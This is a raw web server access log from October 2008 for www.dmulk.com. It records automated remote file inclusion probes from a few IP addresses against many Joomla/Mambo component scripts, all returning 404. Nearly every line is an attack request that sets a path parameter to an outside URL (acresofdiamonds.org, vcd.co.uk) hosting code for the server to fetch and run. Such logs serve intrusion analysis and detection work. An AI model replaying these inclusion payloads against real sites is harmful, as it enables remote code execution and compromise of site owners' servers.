213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080603.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080603.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080603.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080603.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080606.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:47 -0700] "GET /logs/access_080530.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080603.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080603.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080603.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080606.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
